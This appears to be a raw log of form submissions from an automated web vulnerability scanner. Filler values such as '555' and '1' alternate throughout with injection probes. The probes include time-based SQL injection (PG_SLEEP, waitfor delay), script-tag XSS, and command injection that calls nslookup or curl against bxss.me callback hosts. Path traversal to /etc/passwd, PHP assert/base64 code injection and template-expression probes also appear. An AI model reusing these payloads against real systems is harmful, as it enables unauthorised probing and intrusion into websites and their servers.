555-1 OR 140=(SELECT 140 FROM PG_SLEEP(15))--
1
555
1
555
1
redirtest.acx
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555-1) OR 315=(SELECT 315 FROM PG_SLEEP(15))--
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555-1)) OR 372=(SELECT 372 FROM PG_SLEEP(15))--
1
555
1
555
1
555
1
555
1
555
1
-1" OR 5*5=25 --
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555oVq19vzp' OR 183=(SELECT 183 FROM PG_SLEEP(15))--
1
555
1
555
1
-1' OR 5*5=25 or 'yqFekUPC'='
1
555
1
555
1
555
1
555
1
555
1&n966098=v980605
555
1
555
1
-1" OR 5*5=25 or "wjWr6VQD"="
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555&n916165=v956274
1
555PcNjIS4h') OR 763=(SELECT 763 FROM PG_SLEEP(15))--
1
555
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555*if(now()=sysdate(),sleep(15),0)
1
555
)
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
!(()&&!|*|*|
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
555
1
555
^(#$!@#$)(()))******
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
5552MXhjVng')) OR 856=(SELECT 856 FROM PG_SLEEP(15))--
1
555
1
555
1
555
1
555
1
555
1
555
1
555
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
1
555
1
555
1
555
1
555
1
555
1
555
1
)
1
555
1
555
1
555
1
555
555
1
555
1
!(()&&!|*|*|
1
555
1
555
1
555
1
555
1
555
1
555
1
^(#$!@#$)(()))******
1
555
1
555
'"()
555
1
555
1
555
1
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
1
555
1
555
1
555
1
555
1
555
1'&&sleep(27*1000)*nnxqyt&&'
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
1
555
1
555
1
555
1
555
1
555
1"&&sleep(27*1000)*zznzrk&&"
555
1
555
1
555
1
555
1
555
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
555
1'||sleep(27*1000)*pkqfdd||'
555
1
555
1
555
1
555
1
555
1
555
1
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
1
555
1
555
1
555
1
555
1
555
1
555
1
555
xfs.bxss.me
555
1"||sleep(27*1000)*tujsvk||"
555
1
555
1
555
1
555
1
xfs.bxss.me
1
555
1
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
'"
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
1
555
1
555
1
555
1
555
1
555
1
555
1
555
<!--
555
1xlKMjlaL
555
1
555
1
555
1'"()&%<zzz><ScRiPt >W0bV(9296)</ScRiPt>
555'"
1
'"()
1
555
1
555
1
555
1
555
1
555
'"()&%<zzz><ScRiPt >W0bV(9896)</ScRiPt>
555????%2527%2522\'\"
1
555'&&sleep(27*1000)*hdvxat&&'
1
555
1
555
1
'"
1
555
1
@@yfnIw
1
555
1
555
1
555
1
555
1
555
1
555
19745050
555
1
<!--
1
555"&&sleep(27*1000)*lhcwnh&&"
1
555-1; waitfor delay '0:0:15' --
1
555
response.write(9230486*9935270)
555
1
555
1
555
1
555
(select 198766*667891)
1
555'||sleep(27*1000)*qzceaw||'
1
555
1
555
1
555
1
555
1
555
1
(select 198766*667891 from DUAL)
1
555
'+response.write(9230486*9935270)+'
555
1
555
1
555
1
555'"()&%<zzz><ScRiPt >W0bV(9480)</ScRiPt>
1
555
12345'"\'\");|]*{ <>?''????
555
1
555"||sleep(27*1000)*kpyowi||"
1
555
-1 OR 5*5=25 --
555
1
555
"+response.write(9230486*9935270)+"
555
1
555
1
555
1
'"()&%<zzz><ScRiPt >W0bV(9957)</ScRiPt>
1
555
555
1
response.write(9086820*9420068)
1
555
1
555
1
555
1
555
1
555
1
5559769879
1
'+response.write(9086820*9420068)+'
1
555
1
555
1
555
1
555
-1 OR 5*5=25
555
1
555
1
"+response.write(9086820*9420068)+"
1
555
1
555-1); waitfor delay '0:0:15' --
1
555
1
555
echo xznpau$()\ xfqhsb\nz^xyu||a #' &echo xznpau$()\ xfqhsb\nz^xyu||a #|" &echo xznpau$()\ xfqhsb\nz^xyu||a #
555
-1' OR 5*5=25 --
555
1
555
1
555
1
12345'"\'\");|]*{ <>?''????
1
555
1
555
1
555
1
555
1
555
1
555
1
555
-1" OR 5*5=25 --
555
1
555
1
555
1
555
&echo rpvhln$()\ sgyjgu\nz^xyu||a #' &echo rpvhln$()\ sgyjgu\nz^xyu||a #|" &echo rpvhln$()\ sgyjgu\nz^xyu||a #
555
1
555
1
555
1
555
1
555
1
555
1
555
1&echo qswhoy$()\ svpjbq\nz^xyu||a #' &echo qswhoy$()\ svpjbq\nz^xyu||a #|" &echo qswhoy$()\ svpjbq\nz^xyu||a #
555
1
555
1
555
0Tz2IioP
555
1
555
1
555
1
555
-1' OR 5*5=25 or 'kUIuipiF'='
555
1
555
1
555
1
555
1
555
1
555
1
555
m3sZVQ8X: 5sIDArs9
555
1
555
1
555
1
555
1
555
1
555
1
555
-1" OR 5*5=25 or "ASPWux7P"="
555
1
ObfrTgia
1
555
1
555
1
555
|echo conduy$()\ mguykl\nz^xyu||a #' |echo conduy$()\ mguykl\nz^xyu||a #|" |echo conduy$()\ mguykl\nz^xyu||a #
555
1
555
1
555
1
555
1
555
1
555
1
555
1
8akYSAoI: 8Uoqbq4S
1
555
1
555-1 waitfor delay '0:0:15' --
1
555
1
555
1
555
1
555
1
555
1
555
1|echo jgwqqg$()\ ijerur\nz^xyu||a #' |echo jgwqqg$()\ ijerur\nz^xyu||a #|" |echo jgwqqg$()\ ijerur\nz^xyu||a #
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1<esi:include src="http://bxss.me/rpb.png"/>
555
../../../../../../../../../../../../../../etc/passwd
555
1
555
1
555
1
555
1
555
../../../../../../../../../../../../../../windows/win.ini
555
1
555<esi:include src="http://bxss.me/rpb.png"/>
1
555
expr 9000727080 - 953477
555
1
555
1
555
1
555
1
555
1
555
file:///etc/passwd
555
1*if(now()=sysdate(),sleep(15),0)
555
1
555
1
555
(nslookup -q=cname hitfhhihceaepcdf40.bxss.me||curl hitfhhihceaepcdf40.bxss.me))
555
${9999494+9999866}
555
1
555
1
555
1
555SlgM5DtN'; waitfor delay '0:0:15' --
1
555
1
555
1
555
1
555
1
555
1
555
$(nslookup -q=cname hitccpkvcucqfc619d.bxss.me||curl hitccpkvcucqfc619d.bxss.me)
555
1
555
1
555
1
555
../1
555
1
${10000309+9999076}
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
../../../../../../../../../../../../../../etc/passwd
1
555
1
555
1
555
&nslookup -q=cname hitweufjggdnub3f86.bxss.me&'\"`0&nslookup -q=cname hitweufjggdnub3f86.bxss.me&`'
555
1
555
1
555
10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Z
../../../../../../../../../../../../../../windows/win.ini
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555-1 OR 430=(SELECT 430 FROM PG_SLEEP(15))--
1
file:///etc/passwd
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
&(nslookup -q=cname hitbtmxqmyrtl5a05b.bxss.me||curl hitbtmxqmyrtl5a05b.bxss.me)&'\"`0&(nslookup -q=cname hitbtmxqmyrtl5a05b.bxss.me||curl hitbtmxqmyrtl5a05b.bxss.me)&`'
555
1
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555
10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"Z
555
1
555
1
555
1
555
1
555
1
555
1
555-1) OR 576=(SELECT 576 FROM PG_SLEEP(15))--
1
555
1
555
1
555
|(nslookup -q=cname hitbzmrwkoilf7a0f2.bxss.me||curl hitbzmrwkoilf7a0f2.bxss.me)
555
';print(md5(31337));$a='
555
1
555
1
555
1
555
1
555
`(nslookup -q=cname hitgcrwralzox65de0.bxss.me||curl hitgcrwralzox65de0.bxss.me)`
555
1
555
1
555
1
555
1
555
1
555
1
555
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555
1
../555
1
555
";print(md5(31337));$a="
555
1
555
;(nslookup -q=cname hitftiwgoeufva231f.bxss.me||curl hitftiwgoeufva231f.bxss.me)|(nslookup -q=cname hitftiwgoeufva231f.bxss.me||curl hitftiwgoeufva231f.bxss.me)&(nslookup -q=cname hitftiwgoeufva23
555
1
555
1
555-1)) OR 914=(SELECT 914 FROM PG_SLEEP(15))--
1
555
1
555
1
555
1
555
${@print(md5(31337))}
555
1
555
1
555
'.gethostbyname(lc('hitmd'.'uovvupez34d7e.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(103).chr(65).chr(99).chr(84).'
555
1
555
1
555
1-1; waitfor delay '0:0:15' --
555
1
555
1
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
555
1
555
${@print(md5(31337))}\
555
1
555
|(nslookup${IFS}-q${IFS}cname${IFS}hitpqwraybcxi3593c.bxss.me||curl${IFS}hitpqwraybcxi3593c.bxss.me)
555XhCfXJV6' OR 356=(SELECT 356 FROM PG_SLEEP(15))--
1
555
1
555
1
555
".gethostbyname(lc("hitix"."teageegf4b14d.bxss.me."))."A".chr(67).chr(hex("58")).chr(116).chr(65).chr(99).chr(66)."
555
1
555
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
555
'.print(md5(31337)).'
555
1
555
HttP://bxss.me/t/xss.html?%00
555
1
555
"+"A".concat(70-3).concat(22*4).concat(112).concat(82).concat(122).concat(79)+(require"socket" Socket.gethostbyname("hitrl"+"olsaiiju930bf.bxss.me.")[3].to_s)+&
555
1
555
1-1); waitfor delay '0:0:15' --
555
1
555
&(nslookup${IFS}-q${IFS}cname${IFS}hityjuddilmbqe3617.bxss.me||curl${IFS}hityjuddilmbqe3617.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hityjuddilmbqe3617.bxss.me||curl${IFS}h
555
1
555
/etc/shells
555
1
555
1
555pbMnnkjf') OR 618=(SELECT 618 FROM PG_SLEEP(15))--
1
555
bxss.me/t/xss.html?%00
555
1
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
1
echo xlnlbj$()\ cwhiso\nz^xyu||a #' &echo xlnlbj$()\ cwhiso\nz^xyu||a #|" &echo xlnlbj$()\ cwhiso\nz^xyu||a #
1
555
1
555
1
555
1
555
'+'A'.concat(70-3).concat(22*4).concat(112).concat(73).concat(102).concat(68)+(require'socket' Socket.gethostbyname('hitjg'+'jcssqlqx0b8de.bxss.me.')[3].to_s)+&
555
1-1 waitfor delay '0:0:15' --
555
../../../../../../../../../../../../../../etc/shells
555
1
555
1
';print(md5(31337));$a='
1
555
'A'.concat(70-3).concat(22*4).concat(98).concat(82).concat(103).concat(68)+(require'socket' Socket.gethostbyname('hitmx'+'dbmqviiie9c30.bxss.me.')[3].to_s)
555
1
555
1
HttP://bxss.me/t/xss.html?%00
1
555
c:/windows/win.ini
555
1
555
1
555
1
"+"A".concat(70-3).concat(22*4).concat(117).concat(79).concat(109).concat(90)+(require"socket" Socket.gethostbyname("hitnc"+"vkuaobiz5b7f5.bxss.me.")[3].to_s)+"
1
555
1
&echo jyopeq$()\ vlhbno\nz^xyu||a #' &echo jyopeq$()\ vlhbno\nz^xyu||a #|" &echo jyopeq$()\ vlhbno\nz^xyu||a #
1
bxss.me/t/xss.html?%00
1
555
depoimentos
";print(md5(31337));$a="
1
555
1
555
gethostbyname(lc('hitoy'.'vooslckfbd821.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(114).chr(74).chr(121).chr(84)
555ElFN4Cl8')) OR 228=(SELECT 228 FROM PG_SLEEP(15))--
1
555
1
555
bxss.me
555
1
555
depoimentos
555&echo wxxcyl$()\ lqalpl\nz^xyu||a #' &echo wxxcyl$()\ lqalpl\nz^xyu||a #|" &echo wxxcyl$()\ lqalpl\nz^xyu||a #
1
'+'A'.concat(70-3).concat(22*4).concat(109).concat(71).concat(109).concat(90)+(require'socket' Socket.gethostbyname('hitqm'+'uxbkhxar72135.bxss.me.')[3].to_s)+'
1
'.gethostbyname(lc('hitsu'.'oqqubdtc5fa21.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(117).chr(84).chr(99).chr(83).'
1
555
1
${@print(md5(31337))}
1
555
Http://bxss.me/t/fit.txt
555
1TkQj452K'; waitfor delay '0:0:15' --
555
1
555
1
555
1
|echo cflslb$()\ cvewjw\nz^xyu||a #' |echo cflslb$()\ cvewjw\nz^xyu||a #|" |echo cflslb$()\ cvewjw\nz^xyu||a #
1
555
1
'A'.concat(70-3).concat(22*4).concat(103).concat(86).concat(106).concat(85)+(require'socket' Socket.gethostbyname('hitgh'+'phjoxsoi7d9bf.bxss.me.')[3].to_s)
1
555
depoimentos/.
${@print(md5(31337))}\
1
555
http://bxss.me/t/fit.txt?.jpg
555
1
555
1
555
1
555
1
555
1
'.print(md5(31337)).'
1
".gethostbyname(lc("hitbq"."ldvlfbor3fea9.bxss.me."))."A".chr(67).chr(hex("58")).chr(117).chr(73).chr(114).chr(89)."
1
555|echo gefbge$()\ mjnimj\nz^xyu||a #' |echo gefbge$()\ mjnimj\nz^xyu||a #|" |echo gefbge$()\ mjnimj\nz^xyu||a #
1
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
1
555
1
555
1
555
1
depoimentos
1
555
1
555
1
555
1
expr 9000826863 - 978058
1
555
1
depoimentos
1
555
1
555
1
gethostbyname(lc('hitjt'.'nigqfmtj69147.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(109).chr(75).chr(110).chr(83)
1
555
1
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
1
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
1
(nslookup -q=cname hitxzojuluory6e7a2.bxss.me||curl hitxzojuluory6e7a2.bxss.me))
1
555
1
555
1
555
1
depoimentos/.
1
555
1
555
1
555
1
555
1
555
1-1 OR 569=(SELECT 569 FROM PG_SLEEP(15))--
/etc/shells
1
555
1
555
1
$(nslookup -q=cname hitehonietgvof76bb.bxss.me||curl hitehonietgvof76bb.bxss.me)
1
555
1
555
1
../../../../../../../../../../../../../../etc/shells
1
555
1
555
1
555
1
555
1
c:/windows/win.ini
1
555
1
555
1
555
1
555
1
555
1
555
1
bxss.me
1
555
1
&nslookup -q=cname hittkucquqryiea352.bxss.me&'\"`0&nslookup -q=cname hittkucquqryiea352.bxss.me&`'
1
555
1
555
1
555
1
555
1
555
1
555
1
Http://bxss.me/t/fit.txt
1
555
1
555
1
555
redirtest.acx
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1
555
1
555
1
http://bxss.me/t/fit.txt?.jpg
1
555
1
555
1
555
1
redirtest.acx
1
555
1
555
1
&(nslookup -q=cname hithschaysymx2ec47.bxss.me||curl hithschaysymx2ec47.bxss.me)&'\"`0&(nslookup -q=cname hithschaysymx2ec47.bxss.me||curl hithschaysymx2ec47.bxss.me)&`'
1
555
1
555
1
555
1
555
1
555
1-1) OR 166=(SELECT 166 FROM PG_SLEEP(15))--
555
1
555
1
555
1
555
1
555
1
555
1
555'"
1
555
1
555
1
555
1
555
1
555
1
|(nslookup -q=cname hitrpgviebezhe7d9e.bxss.me||curl hitrpgviebezhe7d9e.bxss.me)
1
555
1
555
1
555
1
555
1
555
1
555
1
555????%2527%2522\'\"
1
555
1
555
1
555
1
555
1-1)) OR 133=(SELECT 133 FROM PG_SLEEP(15))--
555
1
`(nslookup -q=cname hitgvpterdpsd55e45.bxss.me||curl hitgvpterdpsd55e45.bxss.me)`
1
555
1
555
1
555
1
555
1
555
1
555
1
@@PGTwa
1
555
1
555
1
555
1
;(nslookup -q=cname hithhdechmquj952eb.bxss.me||curl hithhdechmquj952eb.bxss.me)|(nslookup -q=cname hithhdechmquj952eb.bxss.me||curl hithhdechmquj952eb.bxss.me)&(nslookup -q=cname hithhdechmquj952eb.bxss.me||curl hithhdechmquj952eb.bxss.me)
1
555
1
555
1
555
1
555
1
(select 198766*667891)
1
555
1
555
1
555
1
|(nslookup${IFS}-q${IFS}cname${IFS}hitjfmdejkvkoc1b82.bxss.me||curl${IFS}hitjfmdejkvkoc1b82.bxss.me)
1
555
1
555
1
555
1
(select 198766*667891 from DUAL)
1
555
1
&(nslookup${IFS}-q${IFS}cname${IFS}hitmpnwkikneg812b6.bxss.me||curl${IFS}hitmpnwkikneg812b6.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitmpnwkikneg812b6.bxss.me||curl${IFS}hitmpnwkikneg812b6.bxss.me)&`'
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1H3zAgsb6' OR 460=(SELECT 460 FROM PG_SLEEP(15))--
555
1
555
1
555
1
555
1
555
1
555
1
555
1&n978848=v960967
555
1
555
1
555
1
555
1
555
1
555
1
555&n987788=v917896
1
555
1
555
1
555
1
555
)
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
!(()&&!|*|*|
555
1
555
1
555
1
555
1
555
1
555
1
555
^(#$!@#$)(()))******
555
1
555
1
555
1
555
1
555
1
555
1
555
1
)
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
555
1
555
1
555
1
555
1
555
1
555
1loBzAA5e') OR 759=(SELECT 759 FROM PG_SLEEP(15))--
!(()&&!|*|*|
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
^(#$!@#$)(()))******
1
555
1
555
'"()
555
1
555
1
555
1
555
1
555
1
555
1'&&sleep(27*1000)*rnfjfc&&'
555
1
555
1
555
1gesANu5O')) OR 910=(SELECT 910 FROM PG_SLEEP(15))--
555
1
555
1
555
1
555
1
555
1"&&sleep(27*1000)*szwdcj&&"
555
1
555
1
555
1
555
1'||sleep(27*1000)*tqokod||'
555
1
555
1
555
1
555
1
555
1"||sleep(27*1000)*tvsrtr||"
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
'"()
1
555
1
555
1
555
1
555
1
555
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555
1
555
1
555
1
555
1
555
1
555'&&sleep(27*1000)*yxdema&&'
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555"&&sleep(27*1000)*yiyynn&&"
1
555
1'"
555
1
555
1
555
1
555
1
555
1
555'||sleep(27*1000)*hhipsj||'
1
555
1????%2527%2522\'\"
555
1
555
1
555
1
555
1
555"||sleep(27*1000)*cdmrsg||"
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
@@fDrFD
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
(select 198766*667891)
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
(select 198766*667891 from DUAL)
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
5550FzvQiHW
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
-1 OR 5*5=25 --
1
555
1
555
1
555
1
555
1
-1 OR 5*5=25
1
555
1
555
1
555
1
555
1
-1' OR 5*5=25 --
1
555
1
555
1
555
1
555
1
555
1
-1" OR 5*5=25 --
1
555
1
555
1
555
1
555
1
-1' OR 5*5=25 or 'WhXRwiXw'='
1
555
1
-1" OR 5*5=25 or "zYuwHAQ8"="
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555*if(now()=sysdate(),sleep(15),0)
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555-1; waitfor delay '0:0:15' --
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555-1); waitfor delay '0:0:15' --
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555-1 waitfor delay '0:0:15' --
1
555
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
555
1
555
xfs.bxss.me
555
1
555
1
xfs.bxss.me
1
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
1
555
1
555
1
555
1
555
1
555
1
555
1
555
'"
555
1
555
<!--
555
1'"()&%<zzz><ScRiPt >jmzB(9075)</ScRiPt>
555
555
1
'"
1
555
1
555
'"()&%<zzz><ScRiPt >jmzB(9138)</ScRiPt>
555
12345'"\'\");|]*{ <>?''????
555
1
555
response.write(9279098*9947957)
555
1
<!--
1
555CtgdWa1F'; waitfor delay '0:0:15' --
1
555
19896780
555
1
555
'+response.write(9279098*9947957)+'
555
1
555
1
555
555
"+response.write(9279098*9947957)+"
555
1
555
1
555
1
555
1
555'"()&%<zzz><ScRiPt >jmzB(9593)</ScRiPt>
1
555
1
response.write(9698007*9210608)
1
555
1
'"()&%<zzz><ScRiPt >jmzB(9745)</ScRiPt>
1
555
1
'+response.write(9698007*9210608)+'
1
555
1
555
1
5559394465
1
555
echo wslani$()\ ekygxl\nz^xyu||a #' &echo wslani$()\ ekygxl\nz^xyu||a #|" &echo wslani$()\ ekygxl\nz^xyu||a #
555
1
555
1
"+response.write(9698007*9210608)+"
1
12345'"\'\");|]*{ <>?''????
1
555
&echo ivifiu$()\ ijlwgz\nz^xyu||a #' &echo ivifiu$()\ ijlwgz\nz^xyu||a #|" &echo ivifiu$()\ ijlwgz\nz^xyu||a #
555
1
555
W6XqU7FO
555
1
555
1
555
1&echo wlraig$()\ manpxt\nz^xyu||a #' &echo wlraig$()\ manpxt\nz^xyu||a #|" &echo wlraig$()\ manpxt\nz^xyu||a #
555
1
555
1
555
1
555
1
555-1 OR 908=(SELECT 908 FROM PG_SLEEP(15))--
1
555
1
555
7EFR9f7J: uOTF76le
555
|echo fqbkvq$()\ zaqhwo\nz^xyu||a #' |echo fqbkvq$()\ zaqhwo\nz^xyu||a #|" |echo fqbkvq$()\ zaqhwo\nz^xyu||a #
555
1
32YOLx1s
1
555
1
555
1
555
1
555
1|echo koxdjc$()\ wwjxej\nz^xyu||a #' |echo koxdjc$()\ wwjxej\nz^xyu||a #|" |echo koxdjc$()\ wwjxej\nz^xyu||a #
duglTRlR: KbFIiFGX
1
555
1
555
1
555
1
555
../../../../../../../../../../../../../../etc/passwd
555
1
555
expr 9000165713 - 989206
555
1
555
1
555
1
555
1
555
1
555
1
555
../../../../../../../../../../../../../../windows/win.ini
555
(nslookup -q=cname hitihwqbywhsf8993c.bxss.me||curl hitihwqbywhsf8993c.bxss.me))
555
1
555
1KEIBqYCe
555
1
555
1
555
1
555
1
555
1
555
1
555
file:///etc/passwd
555
1
555
1
555
1
555
1
555
$(nslookup -q=cname hitfjxajmeeyq959fb.bxss.me||curl hitfjxajmeeyq959fb.bxss.me)
555
../1
555
1
555
1
555
&nslookup -q=cname hityuppyhdddv01c2f.bxss.me&'\"`0&nslookup -q=cname hityuppyhdddv01c2f.bxss.me&`'
555-1) OR 936=(SELECT 936 FROM PG_SLEEP(15))--
1
555
1<esi:include src="http://bxss.me/rpb.png"/>
555
1
555
1
555
1
../../../../../../../../../../../../../../etc/passwd
1
555
&(nslookup -q=cname hitdwxuckmofh4e3c1.bxss.me||curl hitdwxuckmofh4e3c1.bxss.me)&'\"`0&(nslookup -q=cname hitdwxuckmofh4e3c1.bxss.me||curl hitdwxuckmofh4e3c1.bxss.me)&`'
555<esi:include src="http://bxss.me/rpb.png"/>
1
555
1
555
1
555
1
../../../../../../../../../../../../../../windows/win.ini
1
555
|(nslookup -q=cname hitvadofhmwftddbbc.bxss.me||curl hitvadofhmwftddbbc.bxss.me)
555
${10000367+9999629}
555
1
555
1
555
1
555
1
file:///etc/passwd
1
555
1
${10000488+9999149}
1
555
`(nslookup -q=cname hitxuwvizivrhbf181.bxss.me||curl hitxuwvizivrhbf181.bxss.me)`
555
1
555
1
555
1
555
1
555
1
555
;(nslookup -q=cname hitkfsjfqpyasbae62.bxss.me||curl hitkfsjfqpyasbae62.bxss.me)|(nslookup -q=cname hitkfsjfqpyasbae62.bxss.me||curl hitkfsjfqpyasbae62.bxss.me)&(nslookup -q=cname hitkfsjfqpyasbae
555
1
555
1
555
1
../555
1
555
1
555
1
555
1
555
1
555
-1 OR 5*5=25 --
555
|(nslookup${IFS}-q${IFS}cname${IFS}hitbyklrjvswn64a80.bxss.me||curl${IFS}hitbyklrjvswn64a80.bxss.me)
555
1
555
1
555
1
555
1
555
-1 OR 5*5=25
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
&(nslookup${IFS}-q${IFS}cname${IFS}hitjsfejtocicce968.bxss.me||curl${IFS}hitjsfejtocicce968.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitjsfejtocicce968.bxss.me||curl${IFS}h
555
-1' OR 5*5=25 --
555
1
555
1
555
1
555
1
555
1
555-1)) OR 292=(SELECT 292 FROM PG_SLEEP(15))--
1
555
-1" OR 5*5=25 --
echo gjpgjm$()\ cpnzht\nz^xyu||a #' &echo gjpgjm$()\ cpnzht\nz^xyu||a #|" &echo gjpgjm$()\ cpnzht\nz^xyu||a #
1
555
1
555
1
555
1
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555
1
555
1
&echo zdkphf$()\ yjbdja\nz^xyu||a #' &echo zdkphf$()\ yjbdja\nz^xyu||a #|" &echo zdkphf$()\ yjbdja\nz^xyu||a #
1
555
1
555
1
555
1
555
1
555
1
555
';print(md5(31337));$a='
555
1
555
1
555
-1' OR 5*5=25 or '7nAN000j'='
555
1
555
1
555&echo fethsz$()\ qwjsjq\nz^xyu||a #' &echo fethsz$()\ qwjsjq\nz^xyu||a #|" &echo fethsz$()\ qwjsjq\nz^xyu||a #
1
555
1
555
1
555
1
555
1
|echo rwtyac$()\ lwadjx\nz^xyu||a #' |echo rwtyac$()\ lwadjx\nz^xyu||a #|" |echo rwtyac$()\ lwadjx\nz^xyu||a #
1
555
-1" OR 5*5=25 or "VkCuf2KB"="
555
1
555
'.gethostbyname(lc('hitdx'.'afmointzdbd6f.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(103).chr(84).chr(101).chr(84).'
555
1
555
1
555|echo rkucub$()\ kkkbvu\nz^xyu||a #' |echo rkucub$()\ kkkbvu\nz^xyu||a #|" |echo rkucub$()\ kkkbvu\nz^xyu||a #
1
555
";print(md5(31337));$a="
555
1
555
HttP://bxss.me/t/xss.html?%00
555
1
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
555
1
555
bxss.me/t/xss.html?%00
555
".gethostbyname(lc("hitmc"."bihinraz20e1a.bxss.me."))."A".chr(67).chr(hex("58")).chr(113).chr(86).chr(104).chr(88)."
expr 9000282397 - 940583
1
555
"+"A".concat(70-3).concat(22*4).concat(112).concat(75).concat(121).concat(72)+(require"socket" Socket.gethostbyname("hiton"+"ertplcymc3141.bxss.me.")[3].to_s)+&
555
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
555
${@print(md5(31337))}
555
1
HttP://bxss.me/t/xss.html?%00
1
555
gethostbyname(lc('hitjx'.'gjaspzpc3fdaa.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(97).chr(84).chr(107).chr(71)
555
1
555
${@print(md5(31337))}\
